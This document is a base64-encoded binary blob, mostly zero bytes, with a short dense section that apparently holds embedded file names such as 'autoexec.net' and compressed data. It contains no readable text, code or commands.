AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACcQADH/xib290AAAAAAAAAAAAAAAgAAwBSHNwdC5kYXQAAAAAAAAAGrAP6AFoYXV0b2V4ZWMubmV0AAAB9AFaHBgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADO7dvbAAMACQAABmwIAADJZztbbbAADAAJAAAAxswhiLAhhNJyNhpOxlxTgf//E6GMADEbDDef/+OBwA7zyOB1MUIw6Bgf8tB//94E9vn/dAWS+MD/////+wBfsIj/+IY3/5P/r//xgf///////////////////////9A8iPyosmBhiORkLhoMxcMhoNBcMRxnfLA+QExfkAArjOC+I4oYjlDiOIuIA5jPDAw1zHYz4wP/////////////////60kkGAB4RmQFkCM7/////////////////3gACAAASIxX//////////////////////////////////////////////////////////////////////////////////////////+GAAgAALsAYH///////////////////kBxtgIAAMYUAKAjf/////////////////4gaMCASMVAAwRiv///9A/hAQBiZhQZGAnG8yGUY+/cq4H/jRf9STHA/QLAACyv1gf////YEgAC+vwGAAEABAONAeHoU37gf/////xEEIL/jQf84H///////////////////+mHHGpUqACkTsIP/A+eO+MD+7mwPpN4/88ds/OZb4gAQ5ZwlgbEeGB+5phNO8sACAAAdM/94H//1hmEIzywP//1Dk98gdD//6wP////////////7Yq/60X/mB/AVLUAjmPzA////+dkz8/P////ngf////////////////////////8TIACFZM2qSWTP/////xwP////////+Fkz////////////2wACAAATY8////6WTP///////////////////////////////////////+AVkz//////////////////////////////////////////////6wACAAAUwBgf////////////////////////AyAAhSJ4AgAB2TP/////////////////////////////////////////////////////////////////7wACAAAUb//////+FkzxAlkz///////////////////////////////////////////////////////////////////////0C2TP/////////////1wAAgAAHgAYH7f+Bcv6Y31wP//////////////+gHir/9aL/vA/gKAACCOY/MD////5gmcw4HhgABAAQDjAHh7Idgf////////////////////////////9TIACFKVpUoBrJn////////////////////////////////+2AAIAABarE//rZM////////////////////////////////////8QPZM//////////////////////////////+gRYVMGIjCgEIFh7/9cD///////////////////3gACAAAmo2///////////////////////////6CZL4AQMTMKYSwPjcVMD/zov+gH1zifQCwQEct9YH///8/YYH3h1EJLxGAAEAB0CDw9o/fA/////////////////////////////hkABClG0rIf4AKROxQ/8D5474wP7Lr8cD0w75wP147LeYFxnngf////////2HJ7xXnA///////6YAIAABohRf///////uCoWoBAAqMKAJQQvv///////3wP/////////////////////6A+PaAoFvDCh3MEfb/////////////////////9MD/////////lVqMD//+8T//////////////////cAAIAABLju///kdz/////////////////////////////////////////////fA///////////////////////////////////////////WACAAATZ4f///////////////////////YEkJf//3E////////////////////////////////////////////////////////////////88AACAAATq93//9gf////////////////////////////////////////////////////////////////9wJW////uJ///////////////////+GAAgAAEuP9/1Hc/////////////////////////////////////////////3wP///////////////////////////////////////////+YAIAABNnx//////////////////////yBI+X//9xP/////////////////////////////////////////////////////////////////1wAAIAABOsHf//2B////////////////////////////////////////////////////////////////UCVn///7if////////////////////5YACAAASY7n/////////////////////////////////////////////GB/////////////////////////////////////////////+wAIAABOoB////////////////////+4Ejpf//3E//////////////////////////////////////////////////////////////////88D94ACAAATMn/////////////////////////////////////////////////////////////////0BK4X//9xP//////////////////////TAAIAABLkff/SIP/////////////////////////////////////////+wP//////////////////////////////////////////////+OACAAATqEf//////////////////+oEjZf//3E//////////////////////////////////////////////////////////////////88D//uAAgAAEzZ////////////////////////////////////////////////////////////////wBK0X//9xP///////////////////////2wACAAAS5L2SIP/////////////////////////////////////////+wP////////////////////////////////////////////////ngAgAAE+iH/////////////////+YEjJf//3E//////////////////////////////////////////////////////////////////88D///+GAACAAAVOn///////////////////////////////8DJZIDACMMKA4gS0v///////////////////////////////sD///////////////////////////tgAgAAEiTN///////////////////////////////////////////////////////////////////////////////////////////hgAIAACuAGB////////////oHREgGAAYYUARAiN////////////1gf////////////+gFJFQMJJJ6TMXMBUAIAgABhgIRRf/////xAcIKf+B88gY3zxzgSFYmSFhmB8AG9EAAAC+piQAzq8AIGDIaDGcDgY83GTQeGB//UBxBjA/B9yLy0AgQAxM2EZaH4hQfGB+NB/zgf//////////////////////////////////9sAACAAAdJjX///////////////////////5WJP/MD////+2JPL8///7gkVgkVAbof/+JBNJyNhpOxl3v//jgf/////////////////////////////////8f+B85h3/////////////ICAQABABBkTQBBkAFQv//+wACAAATovn////////4CYZP////////5gf//6IZ//////////////////////////////////////////////////////////////////////mAAgAAJyzf/rZIgECgAAQAINMiTEOB/6C2iACCNM4RAWCACKH/jnfmB/////7/yMAE/8IABQQkTAxTKpBhH/7AXPAQhiukhxhYoYUhowBLWYzA6/8CmTIeeBtxvkzceYBAm49MDbj4wP/////////////////////////////////////////////////////////////////////////7YAIAAC4tAf///qGLotc6sJYHA9koCYtwkAEzdArtXhgf//////////9U7D+AVEmwoRB////E9Fy9U/jgQRfMQHo///8wP/9KHYgEARIwoCRAQTScjYaTsZeD/mBoYcADICRWCRVpf88D//////////8AGHl/////+IBK5jhCf/////kATJCE8CkVBkNRsMS+Msh4YH5kkf///////////////////////vgfOSRwzyfngfaSR/////////tgAgAAH+G/7YH//ypIf///////////YHzkkcNMn54H2kkf///////////////////////+aikbABBAIwphEAoARzaPGbh4Yj//////////gfM99sD////5gOK8GQymYwnU2HT3/5v8Awmv////88D//////////////////////////eACAAAZZJv/////////////////////////////////916AHnY2GE3DEazCv9a9H/////9KOFOAEChTCmEQCQxDC0/1wP//////////////////////////////////////////////+mACAAAiKE3////////+akqPIAFENRwlgZmBJTjEwIFDrlfp9DoHICCUC4QaGh5eym2SAX5hXCABCZXzntgf/////////////////////yU8gFAYkwphLA////////////////////////////////////KiZchomYUwlgf///////////////////1wAAIAABIjgf//////////////////////////////////////////////////////////////////////////////////////////4YACAAAUwBgf/////////////////////////////////////////////////////////////////////////////////////////4AN+v1KAvOhyGA2HOACAAAi8p64H///////8IX4ZTcZDGaDScIW3//kVCGMxiNhlvf//LApEKZMFpHMJ0Mp3MJ54v//gVIYHgICgcjeZDqYzpxv//DA////////6IIXf//4MBgMRuQRrx+AWI7A///////////////////////////////////////////////////////////2AAA3gAbqX//////wGxorYRYAQAQISDhLA///D/33jgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA